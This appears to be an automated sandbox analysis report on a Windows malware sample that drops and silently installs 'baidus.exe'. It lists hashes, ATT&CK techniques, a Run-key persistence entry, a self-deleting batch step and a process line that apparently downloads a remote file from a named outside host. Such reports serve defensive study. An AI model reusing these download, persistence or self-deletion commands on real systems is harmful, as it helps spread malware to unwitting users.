2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65

Analysis

max time kernel
204s
max time network
202s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
27/11/2022, 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
Size

685KB
MD5

c3955e1a939254d0baba61e7b2975653
SHA1

1b5a5cb1f4eb10776d7ee8ca766e420cd6fa6c57
SHA256

2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65
SHA512

94a22ed7884399306a3ae64dc111295511b8fbcf35433c9bb065dbe9057dbb5fd2371cbd0584662d24031215b719eb19d1f2b3e8efcf0d0e4a7c8242ee2d6875
SSDEEP

12288:RtUBGy8Xz0MqcPHDc2YpKSouCsBvplyt1E5Mx8QVfqlrI+SyjDyD0lRWbk7SZ:UBaXz0MqcPHDc2YpKSo1sBh8t1E5MxZ/

Score

8^/10

discovery persistence

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
268	baidus.exe
540	baidus.tmp
1436	baidus.exe
1064	baidus.exe

Deletes itself 1 IoCs

pid	Process
824	cmd.exe

Loads dropped DLL 5 IoCs

pid	Process
1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
268	baidus.exe
540	baidus.tmp
540	baidus.tmp
540	baidus.tmp

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run	baidus.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\baidu = "C:\\Program Files (x86)\\baidu\\baidus.exe"	baidus.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\baidu\unins000.dat	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\baidus.exe	baidus.tmp
File created	C:\Program Files (x86)\baidu\unins000.dat	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\baidus.data	baidus.tmp
File created	C:\Program Files (x86)\baidu\is-5F0ME.tmp	baidus.tmp
File opened for modification	C:\Program Files (x86)\baidu\baidus.ini	baidus.tmp
File created	C:\Program Files (x86)\baidus.exe	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
File opened for modification	C:\Program Files (x86)\baidus.exe	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
File created	C:\Program Files (x86)\baidu\is-0GFGA.tmp	baidus.tmp
File created	C:\Program Files (x86)\baidu\is-G9LJQ.tmp	baidus.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1316	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
540	baidus.tmp
540	baidus.tmp
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
540	baidus.tmp
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe
1436	baidus.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 268	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	28
PID 1676 wrote to memory of 824	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	29
PID 1676 wrote to memory of 824	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	29
PID 1676 wrote to memory of 824	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	29
PID 1676 wrote to memory of 824	1676	2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe	29
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 268 wrote to memory of 540	268	baidus.exe	31
PID 824 wrote to memory of 1316	824	cmd.exe	32
PID 824 wrote to memory of 1316	824	cmd.exe	32
PID 824 wrote to memory of 1316	824	cmd.exe	32
PID 824 wrote to memory of 1316	824	cmd.exe	32
PID 540 wrote to memory of 1436	540	baidus.tmp	33
PID 540 wrote to memory of 1436	540	baidus.tmp	33
PID 540 wrote to memory of 1436	540	baidus.tmp	33
PID 540 wrote to memory of 1436	540	baidus.tmp	33
PID 540 wrote to memory of 1064	540	baidus.tmp	34
PID 540 wrote to memory of 1064	540	baidus.tmp	34
PID 540 wrote to memory of 1064	540	baidus.tmp	34
PID 540 wrote to memory of 1064	540	baidus.tmp	34

C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
"C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676
- C:\Program Files (x86)\baidus.exe
  "C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Users\Admin\AppData\Local\Temp\is-2SR4T.tmp\baidus.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-2SR4T.tmp\baidus.tmp" /SL5="$10168,67416,56832,C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:540
  - - C:\Program Files (x86)\baidu\baidus.exe
      "C:\Program Files (x86)\baidu\baidus.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:1436
  - - C:\Program Files (x86)\baidu\baidus.exe
      "C:\Program Files (x86)\baidu\baidus.exe" -u=http://a.vipcn8.com/test/3.txt -n=windows.exe
      4⤵
      Executes dropped EXE
      PID:1064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\HZ~F8D1.tmp.bat"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:824
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 2
    3⤵
    - Runs ping.exe
    PID:1316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\baidu\baidus.data

Filesize
18KB

MD5
6daf9e443cbc584c52f88c1c5890aa79

SHA1
127d5d1d4463c176dedcc18c702daf354a34ff9e

SHA256
1845a6842901f74e86f05741dbb688b63c54b5fbeaf33baea208041004f1e4bd

SHA512
f10837c23bf0e4316351c793f4bb23f74ae1f860c55c50a323f2951a490c43336926d6e15742836c8ec398917d2c461be0a1ef61aec1d3e659f24594dd8db57d

Download Submit
C:\Program Files (x86)\baidu\baidus.exe

Filesize
7KB

MD5
b155d1a64ad43bdfc95ccaeac0cd6eae

SHA1
a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

SHA256
a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

SHA512
a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

Download Submit
C:\Program Files (x86)\baidu\baidus.exe

Filesize
7KB

MD5
b155d1a64ad43bdfc95ccaeac0cd6eae

SHA1
a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

SHA256
a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

SHA512
a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

Download Submit
C:\Program Files (x86)\baidus.exe

Filesize
305KB

MD5
0f91865b8855efd8fd7805e15141d622

SHA1
7a73a294710cbf530410008c175f7abbfadd8e6f

SHA256
d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

SHA512
b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

Download Submit
C:\Program Files (x86)\baidus.exe

Filesize
305KB

MD5
0f91865b8855efd8fd7805e15141d622

SHA1
7a73a294710cbf530410008c175f7abbfadd8e6f

SHA256
d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

SHA512
b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\HZ~F8D1.tmp.bat

Filesize
266B

MD5
e5e32265dd5b1be1560ab3029a7a465a

SHA1
4fdc6c2e5a4d5648fdf3cd5d52897d436d03f2da

SHA256
44b80154fbbb5e50e93d5203a0a6fbedf7de23c0a396e1de1c997a4a690d3e2b

SHA512
e43259682895cc665ffa2bd4496da218c01e6725dedd6f9934f926c462217de6413fdf0b75f00d8a7ad0d563b670525d8e3650add67e5ad72d13c01a0ac3a4d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2SR4T.tmp\baidus.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2SR4T.tmp\baidus.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
\Program Files (x86)\baidu\baidus.exe

Filesize
7KB

MD5
b155d1a64ad43bdfc95ccaeac0cd6eae

SHA1
a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

SHA256
a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

SHA512
a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

Download Submit
\Program Files (x86)\baidus.exe

Filesize
305KB

MD5
0f91865b8855efd8fd7805e15141d622

SHA1
7a73a294710cbf530410008c175f7abbfadd8e6f

SHA256
d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

SHA512
b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

Download Submit
\Users\Admin\AppData\Local\Temp\is-2SR4T.tmp\baidus.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
\Users\Admin\AppData\Local\Temp\is-QEJIS.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-QEJIS.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
memory/268-69-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/268-84-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/268-59-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/540-72-0x00000000741F1000-0x00000000741F3000-memory.dmp

Filesize
8KB

Download
memory/540-78-0x0000000002110000-0x0000000002115000-memory.dmp

Filesize
20KB

Download
memory/1064-87-0x0000000000030000-0x0000000000037000-memory.dmp

Filesize
28KB

Download
memory/1436-81-0x0000000000030000-0x0000000000037000-memory.dmp

Filesize
28KB

Download
memory/1436-79-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1676-54-0x0000000075A31000-0x0000000075A33000-memory.dmp

Filesize
8KB

Download